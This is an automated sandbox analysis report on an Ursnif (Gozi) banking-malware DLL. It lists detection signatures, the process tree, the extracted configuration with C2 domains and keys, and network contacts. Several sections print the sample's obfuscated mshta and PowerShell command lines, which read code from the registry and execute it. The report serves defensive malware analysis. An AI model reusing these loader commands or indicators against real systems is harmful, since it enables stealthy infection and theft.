Loading ...

Play interactive tourEdit tour

Windows Analysis Report 61b85f75e6a7c.dll

Overview

General Information

Sample Name:61b85f75e6a7c.dll
Analysis ID:539453
MD5:26788bdf519813ff2600570a5c8e23d9
SHA1:44f22a053e84cd7afcf34a4fa19dbf512c8a624d
SHA256:25f74513f1f0a72453bf096337daba7268bf77371f7fc210f56672f52b7b3af1
Tags:brtdllexegoziisfbursnif
Infos:

Most interesting Screenshot:

Detection

Ursnif
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Yara detected Ursnif
System process connects to network (likely due to code injection or exploit)
Hooks registry keys query functions (used to hide registry keys)
Maps a DLL or memory area into another process
Writes to foreign memory regions
PE file has a writeable .text section
Writes or reads registry keys via WMI
Machine Learning detection for sample
Allocates memory in foreign processes
Modifies the prolog of user mode functions (user mode inline hooks)
Sigma detected: MSHTA Spawning Windows Shell
Sigma detected: Suspicious Call by Ordinal
Modifies the context of a thread in another process (thread injection)
Sigma detected: Mshta Spawning Windows Shell
Creates a thread in another existing process (thread injection)
Sigma detected: Suspicious Csc.exe Source File Folder
Modifies the export address table of user mode modules (user mode EAT hooks)
Writes registry values via WMI
Modifies the import address table of user mode modules (user mode IAT hooks)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Contains functionality to launch a process as a different user
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Found dropped PE file which has not been started or loaded
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
PE file contains an invalid checksum
Searches for the Microsoft Outlook file path
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Registers a DLL
PE / OLE file has an invalid certificate
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Compiles C# or VB.Net code
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w10x64
  • loaddll32.exe (PID: 6132 cmdline: loaddll32.exe "C:\Users\user\Desktop\61b85f75e6a7c.dll" MD5: 7DEB5DB86C0AC789123DEC286286B938)
    • cmd.exe (PID: 7004 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\61b85f75e6a7c.dll",#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • rundll32.exe (PID: 7056 cmdline: rundll32.exe "C:\Users\user\Desktop\61b85f75e6a7c.dll",#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
        • control.exe (PID: 160 cmdline: C:\Windows\system32\control.exe -h MD5: 625DAC87CB5D7D44C5CA1DA57898065F)
    • regsvr32.exe (PID: 7016 cmdline: regsvr32.exe /s C:\Users\user\Desktop\61b85f75e6a7c.dll MD5: 426E7499F6A7346F0410DEAD0805586B)
      • control.exe (PID: 5952 cmdline: C:\Windows\system32\control.exe -h MD5: 625DAC87CB5D7D44C5CA1DA57898065F)
    • rundll32.exe (PID: 7084 cmdline: rundll32.exe C:\Users\user\Desktop\61b85f75e6a7c.dll,DllRegisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
      • control.exe (PID: 5832 cmdline: C:\Windows\system32\control.exe -h MD5: 625DAC87CB5D7D44C5CA1DA57898065F)
    • control.exe (PID: 5116 cmdline: C:\Windows\system32\control.exe -h MD5: 625DAC87CB5D7D44C5CA1DA57898065F)
  • mshta.exe (PID: 2528 cmdline: C:\Windows\System32\mshta.exe" "about:<hta:application><script>Gxum='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Gxum).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script> MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)
    • powershell.exe (PID: 5784 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name xxbuqnvca -value gp; new-alias -name ylvcupeita -value iex; ylvcupeita ([System.Text.Encoding]::ASCII.GetString((xxbuqnvca "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram)) MD5: 95000560239032BC68B4C2FDFCDEF913)
      • conhost.exe (PID: 6740 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • csc.exe (PID: 6620 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jtmpm3o0\jtmpm3o0.cmdline MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 6496 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES391B.tmp" "c:\Users\user\AppData\Local\Temp\jtmpm3o0\CSCBACB7DE77FE24526BA1047DDC177EBA6.TMP" MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
      • csc.exe (PID: 3760 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\gmpgobli\gmpgobli.cmdline MD5: B46100977911A0C9FB1C3E5F16A5017D)
  • mshta.exe (PID: 2596 cmdline: C:\Windows\System32\mshta.exe" "about:<hta:application><script>Aw2g='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Aw2g).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script> MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)
    • powershell.exe (PID: 6448 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name xxbuqnvca -value gp; new-alias -name ylvcupeita -value iex; ylvcupeita ([System.Text.Encoding]::ASCII.GetString((xxbuqnvca "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram)) MD5: 95000560239032BC68B4C2FDFCDEF913)
      • conhost.exe (PID: 6468 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • csc.exe (PID: 1472 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\wnczrnms\wnczrnms.cmdline MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 6428 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES5A7E.tmp" "c:\Users\user\AppData\Local\Temp\wnczrnms\CSC2E55B817A1C42F79C3F14C28684A599.TMP" MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
  • mshta.exe (PID: 3688 cmdline: C:\Windows\System32\mshta.exe" "about:<hta:application><script>Acrf='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Acrf).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script> MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)
    • powershell.exe (PID: 6444 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name xxbuqnvca -value gp; new-alias -name ylvcupeita -value iex; ylvcupeita ([System.Text.Encoding]::ASCII.GetString((xxbuqnvca "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram)) MD5: 95000560239032BC68B4C2FDFCDEF913)
      • conhost.exe (PID: 5848 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • csc.exe (PID: 5796 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\kon0vos3\kon0vos3.cmdline MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 6312 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4531.tmp" "c:\Users\user\AppData\Local\Temp\kon0vos3\CSCE7DAF0804EB6B39EE1E6CAB9C626.TMP" MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
  • mshta.exe (PID: 5724 cmdline: C:\Windows\System32\mshta.exe" "about:<hta:application><script>Sou4='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Sou4).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script> MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)
    • powershell.exe (PID: 5640 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name xxbuqnvca -value gp; new-alias -name ylvcupeita -value iex; ylvcupeita ([System.Text.Encoding]::ASCII.GetString((xxbuqnvca "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram)) MD5: 95000560239032BC68B4C2FDFCDEF913)
      • conhost.exe (PID: 3628 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • csc.exe (PID: 4904 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\hupbkl0t\hupbkl0t.cmdline MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 4928 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES5221.tmp" "c:\Users\user\AppData\Local\Temp\hupbkl0t\CSC47FEF1B1BE13496F9299275D8347BD99.TMP" MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
  • cleanup

Malware Configuration

Threatname: Ursnif

{"RSA Public Key": "B+xl4hUTn5rXiL0afazu2ddSc/ECZk5wqODKe0fS2KdIXHYzLOi+LPPP1HVzyCQFE2ZPog7imXfWyeJPGgVZO8mmh7g0OCbF0hBgHX6wj0qY1fBDcQxYjLnhuuJTPFt0voqEKHGGIgbiz86prZpdJls6h0dECkyqCOUP77xD4bHwJFYwmMp7govarzlBsbdorQ4qNFnd4O2rK1GEuQisAwdMkb4j9MqHf7vkHewrh1BGBeNcr85NjoxXAnfZDuX+M7b1dWoszYHJF1rgWzk4yz7fc+7Q4leAIr2PkWbTRuRpOe4P6Ok01hKGTLORQhRgWw6Mv2aRFMimHgiQWhhaHetICEhMcBl5C0yxhZCOhu4=", "c2_domain": ["microsoft.com/windowsdisabler", "windows.update3.com", "berukoneru.website", "gerukoneru.website", "fortunarah.com"], "botnet": "8899", "server": "12", "serpent_key": "56473871MNTYAIDA", "sleep_time": "10", "CONF_TIMEOUT": "10", "SetWaitableTimer_value": "0", "DGA_count": "10"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000004.00000003.516477194.0000000004CDD000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
    00000000.00000003.472386293.0000000003AD8000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
      00000003.00000003.519108386.000000000559D000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
        0000002B.00000003.654015675.000001C8ACEEC000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
          0000002B.00000003.654015675.000001C8ACEEC000.00000004.00000040.sdmpGoziRuleWin32.GoziCCN-CERT
          • 0xff0:$: 63 00 6F 00 6F 00 6B 00 69 00 65 00 73 00 2E 00 73 00 71 00 6C 00 69 00 74 00 65 00 2D 00 6A 00 6F 00 75 00 72 00 6E 00 61 00 6C 00 00 00 4F 50 45 52 41 2E 45 58 45 00
          Click to see the 71 entries

          Sigma Overview

          System Summary:

          barindex
          Sigma detected: MSHTA Spawning Windows ShellShow sources
          Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name xxbuqnvca -value gp; new-alias -name ylvcupeita -value iex; ylvcupeita ([System.Text.Encoding]::ASCII.GetString((xxbuqnvca "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram)), CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name xxbuqnvca -value gp; new-alias -name ylvcupeita -value iex; ylvcupeita ([System.Text.Encoding]::ASCII.GetString((xxbuqnvca "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram)), CommandLine|base64offset|contains: >jX, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\mshta.exe" "about:<hta:application><script>Aw2g='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Aw2g).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>, ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 2596, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name xxbuqnvca -value gp; new-alias -name ylvcupeita -value iex; ylvcupeita ([System.Text.Encoding]::ASCII.GetString((xxbuqnvca "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram)), ProcessId: 6448
          Sigma detected: Suspicious Call by OrdinalShow sources
          Source: Process startedAuthor: Florian Roth: Data: Command: rundll32.exe "C:\Users\user\Desktop\61b85f75e6a7c.dll",#1, CommandLine: rundll32.exe "C:\Users\user\Desktop\61b85f75e6a7c.dll",#1, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\61b85f75e6a7c.dll",#1, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7004, ProcessCommandLine: rundll32.exe "C:\Users\user\Desktop\61b85f75e6a7c.dll",#1, ProcessId: 7056
          Sigma detected: Mshta Spawning Windows ShellShow sources
          Source: Process startedAuthor: Florian Roth: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name xxbuqnvca -value gp; new-alias -name ylvcupeita -value iex; ylvcupeita ([System.Text.Encoding]::ASCII.GetString((xxbuqnvca "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram)), CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name xxbuqnvca -value gp; new-alias -name ylvcupeita -value iex; ylvcupeita ([System.Text.Encoding]::ASCII.GetString((xxbuqnvca "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram)), CommandLine|base64offset|contains: >jX, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\mshta.exe" "about:<hta:application><script>Aw2g='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Aw2g).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>, ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 2596, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name xxbuqnvca -value gp; new-alias -name ylvcupeita -value iex; ylvcupeita ([System.Text.Encoding]::ASCII.GetString((xxbuqnvca "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram)), ProcessId: 6448
          Sigma detected: Suspicious Csc.exe Source File FolderShow sources
          Source: Process startedAuthor: Florian Roth: Data: Command: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jtmpm3o0\jtmpm3o0.cmdline, CommandLine: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jtmpm3o0\jtmpm3o0.cmdline, CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name xxbuqnvca -value gp; new-alias -name ylvcupeita -value iex; ylvcupeita ([System.Text.Encoding]::ASCII.GetString((xxbuqnvca "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram)), ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 5784, ProcessCommandLine: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jtmpm3o0\jtmpm3o0.cmdline, ProcessId: 6620
          Sigma detected: Non Interactive PowerShellShow sources
          Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name xxbuqnvca -value gp; new-alias -name ylvcupeita -value iex; ylvcupeita ([System.Text.Encoding]::ASCII.GetString((xxbuqnvca "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram)), CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name xxbuqnvca -value gp; new-alias -name ylvcupeita -value iex; ylvcupeita ([System.Text.Encoding]::ASCII.GetString((xxbuqnvca "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram)), CommandLine|base64offset|contains: >jX, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\mshta.exe" "about:<hta:application><script>Aw2g='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Aw2g).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>, ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 2596, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name xxbuqnvca -value gp; new-alias -name ylvcupeita -value iex; ylvcupeita ([System.Text.Encoding]::ASCII.GetString((xxbuqnvca "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram)), ProcessId: 6448
          Sigma detected: T1086 PowerShell ExecutionShow sources
          Source: Pipe createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: PipeName: \PSHost.132839797066077040.6448.DefaultAppDomain.powershell

          Jbx Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Found malware configurationShow sources
          Source: 00000005.00000002.671518506.0000000002E10000.00000040.00000001.sdmpMalware Configuration Extractor: Ursnif {"RSA Public Key": "B+xl4hUTn5rXiL0afazu2ddSc/ECZk5wqODKe0fS2KdIXHYzLOi+LPPP1HVzyCQFE2ZPog7imXfWyeJPGgVZO8mmh7g0OCbF0hBgHX6wj0qY1fBDcQxYjLnhuuJTPFt0voqEKHGGIgbiz86prZpdJls6h0dECkyqCOUP77xD4bHwJFYwmMp7govarzlBsbdorQ4qNFnd4O2rK1GEuQisAwdMkb4j9MqHf7vkHewrh1BGBeNcr85NjoxXAnfZDuX+M7b1dWoszYHJF1rgWzk4yz7fc+7Q4leAIr2PkWbTRuRpOe4P6Ok01hKGTLORQhRgWw6Mv2aRFMimHgiQWhhaHetICEhMcBl5C0yxhZCOhu4=", "c2_domain": ["microsoft.com/windowsdisabler", "windows.update3.com", "berukoneru.website", "gerukoneru.website", "fortunarah.com"], "botnet": "8899", "server": "12", "serpent_key": "56473871MNTYAIDA", "sleep_time": "10", "CONF_TIMEOUT": "10", "SetWaitableTimer_value": "0", "DGA_count": "10"}
          Machine Learning detection for sampleShow sources
          Source: 61b85f75e6a7c.dllJoe Sandbox ML: detected
          Source: 61b85f75e6a7c.dllStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
          Source: unknownHTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.6:49812 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.6:49813 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.6:49814 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.6:49815 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.6:49816 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.6:49817 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.6:49819 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.6:49820 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.6:49821 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.6:49822 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.6:49823 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.6:49825 version: TLS 1.2
          Source: Binary string: ntdll.pdb source: loaddll32.exe, 00000000.00000003.593278567.0000000004C50000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.601958378.0000000004D10000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.587800871.0000000006510000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.605566748.0000000006510000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.587317777.0000000005AC0000.00000004.00000001.sdmp, rundll32.exe, 00000005.00000003.598679645.00000000061B0000.00000004.00000001.sdmp, rundll32.exe, 00000005.00000003.608276934.00000000061B0000.00000004.00000001.sdmp
          Source: Binary string: ntdll.pdbUGP source: loaddll32.exe, 00000000.00000003.593278567.0000000004C50000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.601958378.0000000004D10000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.587800871.0000000006510000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.605566748.0000000006510000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.587317777.0000000005AC0000.00000004.00000001.sdmp, rundll32.exe, 00000005.00000003.598679645.00000000061B0000.00000004.00000001.sdmp, rundll32.exe, 00000005.00000003.608276934.00000000061B0000.00000004.00000001.sdmp
          Source: Binary string: rundll32.pdb source: control.exe, 0000002A.00000003.671336061.000002081FBEF000.00000004.00000040.sdmp, control.exe, 0000002B.00000003.668289338.000001C8ACDEF000.00000004.00000040.sdmp
          Source: Binary string: rundll32.pdbGCTL source: control.exe, 0000002A.00000003.671336061.000002081FBEF000.00000004.00000040.sdmp, control.exe, 0000002B.00000003.668289338.000001C8ACDEF000.00000004.00000040.sdmp
          Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_0102D1A3 lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,0_2_0102D1A3
          Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_010259E6 FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary,0_2_010259E6
          Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_0103F63F lstrlenW,lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,0_2_0103F63F
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_053DF63F lstrlenW,lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,3_2_053DF63F
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_053CD1A3 lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,3_2_053CD1A3
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_053C59E6 FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary,3_2_053C59E6
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04ABF63F lstrlenW,lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,4_2_04ABF63F
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04AAD1A3 lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,4_2_04AAD1A3
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04AA59E6 FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary,4_2_04AA59E6
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_04C3F63F lstrlenW,lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,5_2_04C3F63F
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_04C259E6 FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary,5_2_04C259E6
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_04C2D1A3 lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,5_2_04C2D1A3
          Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_0103E230 wcscpy,wcscpy,GetLogicalDriveStringsW,GetLogicalDriveStringsW,RtlAllocateHeap,memset,GetLogicalDriveStringsW,WaitForSingleObject,GetDriveTypeW,lstrlenW,wcscpy,lstrlenW,HeapFree,0_2_0103E230

          Networking:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\SysWOW64\regsvr32.exeDomain query: berukoneru.website
          Source: C:\Windows\SysWOW64\regsvr32.exeNetwork Connect: 3.20.161.64 187Jump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 79.110.52.144 187Jump to behavior
          Source: C:\Windows\SysWOW64\regsvr32.exeDomain query: windows.update3.com
          Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 18.219.227.107 187Jump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 3.12.124.139 187Jump to behavior
          Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
          Source: Joe Sandbox ViewASN Name: V4ESCROW-ASRO V4ESCROW-ASRO
          Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
